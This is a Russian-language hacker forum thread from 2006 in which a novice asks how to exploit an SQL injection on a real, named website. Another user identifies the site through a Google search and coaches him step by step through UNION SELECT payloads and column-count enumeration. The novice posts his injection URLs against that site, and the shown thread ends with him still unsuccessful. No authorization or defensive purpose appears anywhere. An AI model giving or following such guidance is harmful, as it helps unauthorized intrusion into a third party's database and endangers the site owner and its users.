Возможна ли SQl инъекция ?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Возможна ли SQl инъекция ? - 2006-02-21 00:48:48
|
|
|
Folk_91
Сообщений: 52
Оценки: 0
Присоединился: 2005-05-28 21:57:03
|
Есть некий сайт : www.***.org/new/article.php?id=96
при следующей постановке : www.***.org/new/article.php?id=99999 в браузере выводится сообщение об ошибки:
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''and typeid=2 and publish=1 ORDER BY date DESC'' at line 1
при следующей постановке : www.***.org/new/article.php?id=99999'' в браузере выводится сообщение об ошибки: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '''''' at line 1
Если не трудно обьесните что из этого можно поиметь ? В этом виде атаки я новичок
зарание спасибо Isq:25678965 E-mail: doyoudo@rambler.ru
|
|
|
Возможна ли SQl инъекция ? - 2006-02-21 11:34:09
|
|
|
DeXN
Сообщений: 192
Оценки: 0
Присоединился: 2005-04-23 19:10:38
|
SQL-injection возможна. Запрос должен выглядеть примерно так: article.php?id=9999 union select date,publish,0,0,0,0 from articles А воббще читай инфу по иньекциям[sm=2.gif]
|
|
|
Возможна ли SQl инъекция ? - 2006-02-21 16:54:32
|
|
|
Folk_91
Сообщений: 52
Оценки: 0
Присоединился: 2005-05-28 21:57:03
|
ответ: The used SELECT statements have a different number of columns
как я понял нет прав на SELECT ?
и если не трудно что делает данный запрос как я понял он выводит столбец с именем date Если я всё правильно понял ?
Зарание спасибо
|
|
|
Возможна ли SQl инъекция ? - 2006-02-21 22:04:10
|
|
|
Folk_91
Сообщений: 52
Оценки: 0
Присоединился: 2005-05-28 21:57:03
|
Не буду спрашивать как ты это узнал но это так wwww.xxx.org = www.soaw.org что уже приходилось иметь с ним дело ?
Зарание спасибо
|
|
|
Возможна ли SQl инъекция ? - 2006-02-21 22:09:16
|
|
|
Folk_91
Сообщений: 52
Оценки: 0
Присоединился: 2005-05-28 21:57:03
|
Так я правильно понял насчёт : прав на SELECT ?
Зарание спасибо
|
|
|
Возможна ли SQl инъекция ? - 2006-02-22 00:12:17
|
|
|
DeXN
Сообщений: 192
Оценки: 0
Присоединился: 2005-04-23 19:10:38
|
Нашёл я его легко! Обычный запрос в гугле inurl:".org/new/article.php?id=96" The used SELECT statements have a different number of columns озночает, что тебе надо подобрать число столбцов![sm=2.gif]
|
|
|
Возможна ли SQl инъекция ? - 2006-02-22 12:44:20
|
|
|
Folk_91
Сообщений: 52
Оценки: 0
Присоединился: 2005-05-28 21:57:03
|
Как я понял date,publish - это имя столбца Я попробовал на примере доков менять место полдожение date,publish так: article.php?id=9999 union select date,publish,0,0,0,0 from articles article.php?id=9999 union select 0,date,publish,0,0,0 from articles article.php?id=9999 union select 0,0,date,publish,0,0 from articles и т.к но ответ всё тот же
The used SELECT statements have a different number of columns скорее всего я не так понял если не трудно обьясни попадробнее А то я не очень в ехал
Зарание терабайтное спасибо
|
|
|
Возможна ли SQl инъекция ? - 2006-02-22 13:05:17
|
|
|
DeXN
Сообщений: 192
Оценки: 0
Присоединился: 2005-04-23 19:10:38
|
Тебе надо сначала узнать кол-во столбцов в таблице: arcticles.php?id=99 union select null/* arcticles.php?id=99 union select null,null/* И так до тех пор пока с экрана не уберётся надпись The used SELECT statements have a different number of columns
|
|
|
Возможна ли SQl инъекция ? - 2006-02-22 16:47:46
|
|
|
Folk_91
Сообщений: 52
Оценки: 0
Присоединился: 2005-05-28 21:57:03
|
я пробивал до : http://www.soaw.org/new/article.php?id=9999%20union%20select%20%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/* но ответ везде одинаков : The used SELECT statements have a different number of columns
Что делать Далее ? [sm=em88.gif][sm=12.gif][sm=em88.gif]
Зарание спасибо
|
|
|
|
|